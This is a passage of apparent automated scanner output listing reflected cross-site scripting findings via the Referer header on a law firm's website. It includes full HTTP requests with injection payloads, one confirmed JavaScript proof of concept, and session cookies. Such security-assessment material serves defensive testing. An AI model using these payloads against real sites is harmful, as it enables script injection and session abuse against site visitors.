Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events.cfm?id=670&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /experience.cfm?action=case_study HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /global_reach.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html>
<head>
<title>Arnold & Porter LLP - Global Reach</title>
<meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469">
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_disclaimer.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_llp_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_non_discrimination.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_operating_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_privacy_policy.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_statement_clients_rights.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... d_capture_file).click(function() { $.post("process_user_capture.cfm", { name: name, company: company, email: email, from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480', document: $(this).attr('id').replace('doc', '') }, function(data) { }, "json"); }); if (requested_capture_forward == '') { setTimeout('$("#doc" + r ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Practice Areas & Industries</title> <meta nam ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /professionals.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Find an Attorney or Professional</title> <meta na ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
